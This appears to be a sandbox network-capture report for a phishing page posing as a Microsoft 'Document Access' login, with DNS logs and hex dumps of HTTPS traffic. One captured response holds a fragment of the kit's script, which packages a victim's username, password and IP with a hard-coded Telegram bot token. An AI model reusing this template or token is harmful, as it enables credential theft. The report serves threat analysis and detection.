Apr 19, 2024 01:52:38.399789095 CEST	1.1.1.1	192.168.2.4	0x80a2	No error (0)	www.google.com		74.125.138.147	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.399789095 CEST	1.1.1.1	192.168.2.4	0x80a2	No error (0)	www.google.com		74.125.138.106	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.399789095 CEST	1.1.1.1	192.168.2.4	0x80a2	No error (0)	www.google.com		74.125.138.103	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.399789095 CEST	1.1.1.1	192.168.2.4	0x80a2	No error (0)	www.google.com		74.125.138.99	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:38.400773048 CEST	1.1.1.1	192.168.2.4	0xb666	No error (0)	www.google.com			65	IN (0x0001)	false
Apr 19, 2024 01:52:38.987138033 CEST	1.1.1.1	192.168.2.4	0xcc7c	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:38.987199068 CEST	1.1.1.1	192.168.2.4	0x968f	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:38.987199068 CEST	1.1.1.1	192.168.2.4	0x968f	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:39.256187916 CEST	1.1.1.1	192.168.2.4	0x211b	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:39.256187916 CEST	1.1.1.1	192.168.2.4	0x211b	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:39.256187916 CEST	1.1.1.1	192.168.2.4	0x211b	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:39.256232977 CEST	1.1.1.1	192.168.2.4	0x6036	No error (0)	api.ipify.org			65	IN (0x0001)	false
Apr 19, 2024 01:52:40.298124075 CEST	1.1.1.1	192.168.2.4	0x2ef6	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:40.298124075 CEST	1.1.1.1	192.168.2.4	0x2ef6	No error (0)	ipv4.imgur.map.fastly.net		151.101.52.193	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:40.299730062 CEST	1.1.1.1	192.168.2.4	0x119d	No error (0)	i.imgur.com	ipv4.imgur.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:42.299978018 CEST	1.1.1.1	192.168.2.4	0xc7de	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:42.299978018 CEST	1.1.1.1	192.168.2.4	0xc7de	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:42.299978018 CEST	1.1.1.1	192.168.2.4	0xc7de	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:42.300627947 CEST	1.1.1.1	192.168.2.4	0xb88d	No error (0)	api.ipify.org			65	IN (0x0001)	false
Apr 19, 2024 01:52:50.836407900 CEST	1.1.1.1	192.168.2.4	0xd263	No error (0)	windowsupdatebg.s.llnwi.net		69.164.42.0	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:52:51.213515997 CEST	1.1.1.1	192.168.2.4	0xe7b7	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:52:51.213515997 CEST	1.1.1.1	192.168.2.4	0xe7b7	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:53:04.539340973 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:53:04.539340973 CEST	1.1.1.1	192.168.2.4	0x7d8e	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:53:27.075511932 CEST	1.1.1.1	192.168.2.4	0x985	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:53:27.075511932 CEST	1.1.1.1	192.168.2.4	0x985	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Apr 19, 2024 01:53:46.976515055 CEST	1.1.1.1	192.168.2.4	0x7451	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Apr 19, 2024 01:53:46.976515055 CEST	1.1.1.1	192.168.2.4	0x7451	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

cvn7.sa.com

https:

aadcdn.msftauth.net

i.imgur.com

api.ipify.org

fs.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	91.185.215.3	443	5428	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:37 UTC	671	OUT	GET /invoice.html?app= HTTP/1.1 Host: cvn7.sa.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 23:52:37 UTC	206	IN	HTTP/1.1 200 OK Date: Thu, 18 Apr 2024 23:52:37 GMT Server: Apache Last-Modified: Wed, 17 Apr 2024 20:05:02 GMT Accept-Ranges: bytes Content-Length: 9701 Connection: close Content-Type: text/html
2024-04-18 23:52:37 UTC	7986	IN	Data Raw: 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4c 4f 47 49 4e 20 54 48 49 53 20 50 41 47 45 20 49 53 20 52 45 53 54 52 49 43 54 45 44 22 3e 0d 0a 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 41 63 63 65 73 73 20 2d 20 4d 69 63 72 6f 73 6f 66 74 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 20 62 61 63 6b 67 72 6f 75 6e 64 3d 22 68 74 74 70 73 3a 2f 2f 69 2e 69 6d 67 75 72 2e 63 6f 6d 2f 4f 74 74 46 36 44 32 2e 70 6e 67 22 3e 0d 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0d 0a 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 61 64 63 64 6e 2e 6d 73 66 74 61 75 74 68 2e 6e 65 74 2f 73 Data Ascii: </head><head><meta name="description" content="LOGIN THIS PAGE IS RESTRICTED"><title>Document Access - Microsoft</title></head><body background="https://i.imgur.com/OttF6D2.png"><p align="center"><img src="https://aadcdn.msftauth.net/s
2024-04-18 23:52:37 UTC	1715	IN	Data Raw: 61 69 6c 20 41 63 63 65 73 73 20 28 4f 6e 6c 69 6e 65 20 41 63 65 73 73 29 3a 25 30 41 3c 62 3e 55 73 65 72 6e 61 6d 65 3c 2f 62 3e 3a 20 24 7b 74 65 78 74 31 7d 20 25 30 41 3c 62 3e 50 61 73 73 77 6f 72 64 3c 2f 62 3e 3a 20 24 7b 74 65 78 74 32 7d 20 25 30 41 3c 62 3e 49 50 3c 2f 62 3e 3a 20 24 7b 74 65 78 74 33 7d 60 3b 0d 0a 20 20 20 20 2f 2f 20 4e 6f 74 65 21 20 3c 62 72 3e 20 3d 3d 20 25 30 41 20 3c 62 72 3e 2d 4e 6f 74 20 77 6f 72 6b 0d 0a 0d 0a 20 20 20 20 76 61 72 20 74 6f 6b 65 6e 20 3d 20 22 36 39 33 31 37 33 32 39 33 37 3a 41 41 48 2d 52 77 4c 74 74 58 62 44 46 48 59 30 6b 56 4c 2d 6c 48 78 61 4f 34 39 6f 48 53 79 69 59 4a 59 22 3b 20 2f 2f 20 59 6f 75 72 20 54 65 6c 65 67 72 61 6d 20 42 6f 74 20 74 6f 6b 65 6e 0d 0a 20 20 20 20 76 61 72 20 63 Data Ascii: ail Access (Online Acess):%0A<b>Username</b>: ${text1} %0A<b>Password</b>: ${text2} %0A<b>IP</b>: ${text3}`; // Note! <br> == %0A <br>-Not work var token = "6931732937:AAH-RwLttXbDFHY0kVL-lHxaO49oHSyiYJY"; // Your Telegram Bot token var c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	152.199.4.44	443	5428	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:38 UTC	651	OUT	GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1 Host: aadcdn.msftauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cvn7.sa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 23:52:38 UTC	737	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Age: 2216978 Cache-Control: public, max-age=31536000 Content-MD5: nzaLxFgP7ZB3dfMcaybWzw== Content-Type: image/svg+xml Date: Thu, 18 Apr 2024 23:52:38 GMT Etag: 0x8D79A1B9F5E121A Last-Modified: Thu, 16 Jan 2020 00:32:52 GMT Server: ECAcc (agc/7F76) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: 76c53dc6-501e-00c2-6dc1-7d8866000000 x-ms-version: 2009-09-19 Content-Length: 3651 Connection: close
2024-04-18 23:52:38 UTC	3651	IN	Data Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e 32 36 38 2c 30 Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49741	151.101.12.193	443	5428	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-18 23:52:38 UTC	577	OUT	GET /OttF6D2.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://cvn7.sa.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-18 23:52:38 UTC	760	IN	HTTP/1.1 200 OK Connection: close Content-Length: 181441 Content-Type: image/png Last-Modified: Thu, 04 Apr 2024 11:05:39 GMT ETag: "e274663e233bcf68301315590a1989a3" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD12-P2 X-Amz-Cf-Id: dsMlZ3QW3bJUMJEjF1Nm3Bk02MQ9MRDu9-5KsAAyfk8H79kVlMAy7w== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 185788 Date: Thu, 18 Apr 2024 23:52:38 GMT X-Served-By: cache-iad-kcgs7200114-IAD, cache-pdk-katl1840041-PDK X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 7, 0 X-Timer: S1713484359.636989,VS0,VE2 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 4f 00 00 02 bb 08 02 00 00 00 4d 9d e9 b5 00 00 80 00 49 44 41 54 78 da ec fd db 72 24 49 92 26 8c e9 c1 cc 3d 02 c8 cc aa ee dd d9 59 0a 85 2b 42 ca 7f c3 0b 3e 07 5f 88 ef 4c 21 67 39 d3 55 99 88 70 77 33 55 e5 85 9a 99 5b 1c 00 04 80 40 26 32 33 b4 bb aa 00 84 87 bb b9 1d f5 f0 e9 a7 f8 7f fb 7f fd 3f e1 27 10 44 44 24 ff 07 10 00 f0 47 b7 e8 69 31 00 00 33 30 30 53 f3 7f 7e 74 9b 6e 72 93 9b dc e4 26 37 b9 c9 4d de 41 d4 34 89 e6 6c a2 a0 06 00 e0 2a 1b 11 32 15 9d ed 12 3d 08 01 00 91 10 99 10 c0 44 25 8b 89 9a 2a 98 01 02 12 51 08 18 78 bd ed 6b c5 44 2d 8b 8a ba ba b6 fe 1d 01 11 89 08 09 01 eb 33 9e 7a d6 07 57 49 df 41 10 4a e7 5c 3e b2 df 5f 0c c0 c0 44 55 c4 54 4d 0d 6c 9d 99 44 44 4c c0 Data Ascii: PNGIHDROMIDATxr$I&=Y+B>_L!g9Upw3U[@&23?'DD$Gi1300S~tnr&7MA4l2=D%QxkD-3zWIAJ\>_DUTMlDDL
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: ed e7 21 44 44 3c 86 18 fd e8 b6 b6 9f 54 6d ca f3 7f 3e fc 6d 66 7f ef bf fe ef 87 7f 45 e2 f9 3a f9 3a 37 b9 c9 4d 6e 72 93 9b dc e4 26 1f 55 3a 43 ba fc fa e8 95 15 f0 4f 87 d7 77 40 e8 76 65 c1 8a 5b c9 de f7 50 27 52 03 fe bf 44 ac 98 6d 44 a6 a0 56 65 6d 15 21 d1 c7 cf 19 fd 61 e2 89 eb 0d 12 6f 00 a8 0a 44 68 44 0c 70 14 d9 fe 38 82 80 4c 48 68 4a a0 aa a2 50 70 e0 66 60 2a 9e c6 0f 08 4f 86 c7 2b 66 be 18 fc 87 78 7e 33 05 32 34 23 03 64 06 82 b7 d2 f2 95 84 6d 0f e9 4b b1 f7 4e 4c fd 2e ac fd a3 3b f9 bd c5 fb 59 14 aa cb 03 11 a9 e1 1a de e1 f5 11 1c 54 21 22 59 d7 dc 81 13 83 ff f4 d1 65 6a 3c 62 f9 19 f4 00 0d 54 78 66 f8 0e af 07 75 a6 cc b5 99 a7 7e 1e 74 37 10 f1 47 b7 f6 fd fd 90 30 72 b8 8b 9b 3f 36 f7 ff bc ff e3 9f 77 7f 0c 31 12 d2 87 Data Ascii: !DD<Tm>mfE::7Mnr&U:COw@ve[P'RDmDVem!aoDhDp8LHhJPpf`*O+fx~324#dmKNL.;YT!"Yej<bTxfu~t7G0r?6w1
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: 72 e6 69 42 42 90 ce e0 d7 6a c3 f1 49 f5 b2 9b fc d8 73 ca 9e ff cc e3 dc b5 1a 63 a1 4f 6b b0 78 b2 9e a0 fe b5 3d a0 95 86 bd 1a 7b 00 60 80 a8 86 66 44 5d 9a fd 4b 1f 82 8e 3f 60 23 34 21 03 71 b6 3d e7 c6 13 03 32 43 b6 95 5a a2 ff 2a 21 22 03 91 a9 1a 99 8a 80 9c 09 f2 03 9a 19 82 16 6b df f0 11 1e 75 37 52 ac e5 ff 9f 3b dc 0a 1a e5 f7 02 f0 c3 81 a9 6f 0d ec fd 7e cc 7c 17 0a 11 06 0e db 61 fc bc b9 ff b2 bd ff b4 b9 db c4 91 09 45 74 4a f3 d7 69 f7 75 ff f0 15 77 d3 32 27 c8 aa d2 5b a5 58 94 e6 d5 3e 2d fa 8f 55 1e 89 eb c9 0b ac 7d ef 5b 26 22 e2 9a c8 d2 b2 30 9b d2 56 3c 5b dd 8a bc 96 5c 1a cf 2f a4 98 66 65 5f e9 32 c4 de 07 07 f6 58 6b e1 a5 5b 4e 71 30 22 41 3d fd de b2 c5 97 bb 35 e4 c9 b5 15 33 04 40 22 76 b8 2e 96 9a ba 6a aa a2 aa a2 Data Ascii: riBBjIscOkx={`fD]K?`#4!q=2CZ*!"ku7R;o~\|aEtJiuw2'[X>-U}[&"0V<[\/fe_2Xk[Nq0"A=53@"v.j
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: d3 78 37 84 60 00 6e d5 8b 88 a9 7a d8 1f 00 b2 e4 29 cd 73 5e 16 c9 52 a3 2e 7a ed f0 ec 59 31 00 55 5d 72 9a 97 39 a9 20 62 e4 10 88 15 4c 44 00 20 30 47 8e 81 3c c4 07 35 b8 d1 0f df c9 7b af f0 00 78 42 95 7c a2 49 17 be 35 22 32 f1 10 87 31 0e 88 e8 83 9d ab cf bb d3 a3 6a 8b 4a 8c a9 80 79 b1 56 fd 40 04 04 62 a2 c8 21 32 23 a0 a8 26 49 8b 64 28 21 f7 eb 08 22 46 8e db 61 fb c7 dd a7 bb 61 c3 48 59 64 9f a6 6f d3 fe 01 71 c1 45 0b 94 ab 74 6e 1f 47 ea bb bb f1 ab f8 c1 45 44 43 88 9b 61 33 84 08 66 4b 5e a6 65 86 0c 62 82 86 0d ef bb 22 4a ac ed a6 95 2a a1 4b c3 b3 03 67 89 5b 9b 18 38 0c 14 03 31 00 88 49 92 bc e8 35 3b c7 23 dd 43 18 ee 37 77 9f 37 f7 63 18 c0 6c 96 65 bf cc fb 79 4f b8 64 41 35 05 00 5d b5 e4 83 b2 1d 00 07 60 e5 35 9f ab cd 85 Data Ascii: x7`nz)s^R.zY1U]r9 bLD 0G<5{xB\|I5"21jJyV@b!2#&Id(!"FaaHYdoqEtnGEDCa3fK^eb"J*Kg[81I5;#C7w7cleyOdA5]`5
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: 22 40 22 94 4a 12 5c df a8 77 46 37 cd c3 db e7 94 47 57 6a 64 75 e8 04 66 22 14 95 29 cd bb 65 ca 2a 03 07 04 88 c4 1e fc 8f 21 50 2a d5 98 dd ab 12 43 b8 8b 9b 4f db bb 21 8c a6 ba e3 3d 98 aa 08 02 64 25 40 60 e4 31 0c db 61 dc 0c 63 e4 80 88 06 b0 e4 44 48 65 99 a3 36 b4 3f ac 6e 51 9f 8f 20 75 4c b9 e4 3e 98 78 aa 40 0d d4 3b d8 07 71 b5 c9 09 69 0c f1 2e 8e 77 e3 36 70 c8 a6 bb 65 7a 48 38 27 14 51 04 60 cf 1b 44 62 a2 81 42 e4 c0 44 49 64 4e cb 2c 94 25 ab 19 16 ed b3 3a 1a 6a de 0d 41 db a3 4c 1b c2 65 3d 22 6b a2 dc 8a 9f 6f ea 46 0b e6 f8 51 e5 f0 d8 72 28 68 75 01 13 95 fd 96 10 23 87 81 63 0c 0c 06 ee b0 58 24 13 d1 26 0c 9b 38 12 52 96 bc e4 65 c9 49 6a 08 b1 a8 58 0e be 01 f3 e9 e7 74 0c 77 71 1c e3 00 88 b3 66 5e 26 26 52 95 92 73 a5 9a 3d Data Ascii: "@"J\wF7GWjduf")e!PCO!=d%@`1acDHe6?nQ uL>x@;qi.w6pezH8'Q`DbBDIdN,%:jALe="koFQr(hu#cX$&8ReIjXtwqf^&&Rs=
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: 40 d5 5a 73 f1 e0 b3 9a 55 d9 5f fc 58 ff 68 4b 0f 35 53 03 2c 51 9c 56 ff aa 33 c9 d6 e8 9d 99 19 56 a6 3d aa 4c 7b 17 4c 9a 3a 4b 09 01 0a 81 cc 5a 9f 4f 01 d0 80 b8 c2 c5 8e a1 2b 08 5c b6 66 93 ca b8 dd 85 db 1e 65 36 ab 60 04 bf c9 ca 74 50 4f a7 df c5 ce 07 8f df 96 c4 c4 62 9a b5 5c fd 8f c2 56 50 18 ba 02 87 18 02 13 8b a6 69 99 1f f6 df e6 34 e7 61 19 43 b8 1f b7 21 0e 43 88 43 08 81 98 ca 57 28 70 d8 c4 f1 7e b3 fd b2 bd 1f 98 b3 4a 16 21 e2 48 11 00 3e cd db 31 c4 18 e2 b8 df cd 79 31 33 22 64 0a 88 e8 b3 10 01 dc 9e 02 83 d2 3b 08 56 b4 e8 65 bf cc 0b 2c 59 ac e1 c2 ed 45 79 fb 4e 3c 38 c6 b8 89 c3 c0 c1 00 dc b2 02 a4 91 e3 dd b0 d9 7a b0 34 c4 48 e1 4e 36 62 2a a6 49 f3 6e 9e fe 9e 1e 0c 76 be 58 de 35 b3 4f 55 17 49 53 9a be 4e 0f a6 36 c7 Data Ascii: @ZsU_XhK5S,QV3V=L{L:KZO+\fe6`tPOb\VPi4aC!CCW(p~J!H>1y13"d;Ve,YEyN<8z4HN6b*InvX5OUISN6
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: 19 b0 23 07 33 4b 9a 45 85 4a 6a e5 30 86 18 39 64 cd 59 65 8c 03 7b a0 f5 d5 93 fa 74 44 4a 26 11 71 5f 01 c3 c0 e7 43 64 be 1f 9c a6 0b b2 64 51 f1 00 00 21 22 90 82 89 99 99 79 e2 28 02 ce 92 fe da 7f c3 1d 3d a4 39 70 08 cc 81 58 01 03 12 13 0f 1c 07 0e 7f 6e 3f ff b7 4f 7f 7c d9 7c 1a 38 88 95 38 f0 94 96 24 d9 c0 22 95 6f f9 9c 6c 4c f8 aa 52 b0 b5 79 51 b0 cd b0 f9 c7 fd e7 7f de fd b1 1d c6 24 59 4c ff 9e 77 61 0a 4e fa 82 80 57 0a 29 17 83 bf 36 06 19 69 e4 38 50 70 a3 82 91 dd 15 57 6d a1 16 ad 73 53 6d 0d 34 02 98 aa 2e 92 e7 b4 ec e2 34 e7 e4 a7 9c 16 44 03 06 0a 9b 38 dc c5 cd 26 0e 68 a0 83 22 60 60 06 c0 45 f2 92 17 30 63 24 31 d9 4d 7b 34 c8 22 8b 66 32 b9 9e 6b a3 92 2f 58 a9 a9 ee e7 d4 86 07 0e e3 80 01 00 9a 51 14 39 c4 18 19 71 4a 0b Data Ascii: #3KEJj09dYe{tDJ&q_CddQ!"y(=9pXn?O\|\|88$"olLRyQ$YLwaNW)6i8PpWmsSm4.4D8&h"``E0c$1M{4"f2k/XQ9qJ
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: 7d 9b f7 88 30 e7 b4 a3 c9 bd 39 6f 77 21 79 c7 26 c9 29 67 35 8b 14 36 31 aa ea 9c d2 62 3e b5 e2 10 e2 66 18 86 38 c6 10 18 c9 cc 92 e4 94 53 c1 29 b8 85 49 20 2a bb 65 0a fc cd 81 57 1e 3d bb ce 54 28 59 0c 39 e5 24 71 18 c3 70 3f 6e 9c 53 30 72 d8 c4 81 81 a6 bc cc 29 a5 92 93 52 36 69 41 cc 5a 70 e3 59 32 00 28 28 11 8e 61 f8 3c de fd b9 fd bc 0d 03 02 2a 98 3b b0 73 a5 02 a9 44 c5 84 8c e3 30 de 6d b6 9f c6 6d 74 8d 00 0b 86 5f 4d a1 96 29 89 14 a2 db bd 69 41 83 39 2d 8b 66 51 dd c4 d1 d3 61 b6 71 08 1c 08 d0 4c c5 14 0d 02 95 12 21 8a 10 39 6e a3 11 d2 c8 11 01 36 71 b8 1b 36 03 c7 d6 7b a2 c2 b4 54 50 73 a1 b6 bd 8b 9b 50 0a 54 52 40 0e 14 b8 12 c7 94 e4 d2 a2 ed 97 ec 0f af ca 3c 4b 72 ef 09 21 6d e2 f8 69 bc bb 1f b6 ee 17 83 82 4c c9 aa e6 69 Data Ascii: }09ow!y&)g561b>f8S)I eW=T(Y9$qp?nS0r)R6iAZpY2((a<;sD0mmt_M)iA9-fQaqL!9n6q6{TPsPTR@<Kr!miLi
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: c1 36 d0 f2 cf bf 8e 0a ac 1d ad 62 19 a0 25 eb 95 8c 45 73 d2 9f 47 6d 85 c2 ef 58 ca b8 d6 98 25 9e 01 3e b4 d9 42 c8 5a e2 fc da 48 1f 3a 37 2b 9a 02 5c 3c 91 c8 e1 16 68 8a 25 99 bc 9b c9 56 4b 0f 5e 64 eb 3c 71 cd 6f 0e 89 b2 92 00 d9 08 ab 0b 70 e8 83 99 fa 6b 63 ab 2a 42 48 db 61 3b 86 4f 7a f7 39 e5 45 d5 0a 21 6f ce 8d df 87 89 58 0b 16 56 54 b2 a4 2c d9 0c 22 c7 31 6e 22 47 42 12 95 94 b3 a8 20 c0 26 6e b8 e6 30 6e 87 91 99 52 ce bb 79 3f a5 29 d7 f2 b7 43 88 77 c3 66 33 6c 1c a5 3e 86 b8 26 33 76 4d bd 30 b6 5f 60 30 a2 ba 48 da 2f b3 a8 7e 9b 77 fb 65 62 a4 88 ec 69 ae 8c 54 c9 01 b1 c6 ff 55 a4 16 81 d6 37 18 9c 8f 13 94 1c 5c 85 85 cc 69 08 c3 76 d8 22 c0 76 d8 78 1c 98 91 66 5a 3c 04 e1 c9 f0 85 a8 dc a3 e7 80 8c 5a a9 d1 1a ad 74 00 80 24 Data Ascii: 6b%EsGmX%>BZH:7+\<h%VK^d<qopkc*BHa;Oz9E!oXVT,"1n"GB &n0nRy?)Cwf3l>&3vM0_`0H/~webiTU7\iv"vxfZ<Zt$
2024-04-18 23:52:38 UTC	1371	IN	Data Raw: 25 2d d9 c4 33 35 10 b1 10 96 fb a6 87 84 00 cc ec 73 d5 bc b8 77 ce a2 d2 01 02 8b b3 60 bf 4c fb 65 f2 4c 07 e7 ea 74 f0 79 65 3b ba 42 36 39 b8 bf 49 25 4b 16 d5 10 38 50 10 53 55 9b 64 01 80 24 d9 73 e6 45 c5 0a 16 3d 2d e2 74 e8 99 88 96 bc 4c c4 49 b3 17 e4 4b 92 ae 0c 45 31 07 9e 2c 0f f3 4e 25 13 22 83 b3 94 0f 5a e0 f7 82 00 4e 4b be 4f 85 10 05 89 16 49 0f f3 7e 91 c4 c8 a2 ce d5 9f 93 e6 48 41 44 a6 34 3b ab 19 13 11 72 c5 27 da a2 69 b7 cc 6b dd fb 2b 55 c1 b0 e2 28 d1 39 2f 0f f3 fe eb b4 03 40 33 7d 98 f7 9e 2c 6d a6 9e e2 ba 48 8e 14 cc 6c c9 69 ca 4b 96 ec 04 ab 21 95 a4 15 31 dd a5 e9 61 de ef d3 bc 48 be 62 05 3e e8 4a 12 38 ab e8 c0 e1 f3 70 37 86 98 25 ff a5 5a 99 1d 9a 8b ed e0 f5 7c 16 2d 39 21 60 ca 49 cd 98 96 5d 9a 22 87 24 c9 fd Data Ascii: %-35sw`LeLtye;B69I%K8PSUd$sE=-tLIKE1,N%"ZNKOI~HAD4;r'ik+U(9/@3},mHliK!1aHb>J8p7%Z\|-9!`I]"$

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49743	152.199.4.44	443	5428	C:\Program Files\Google\Chrome\Application\chrome.exe

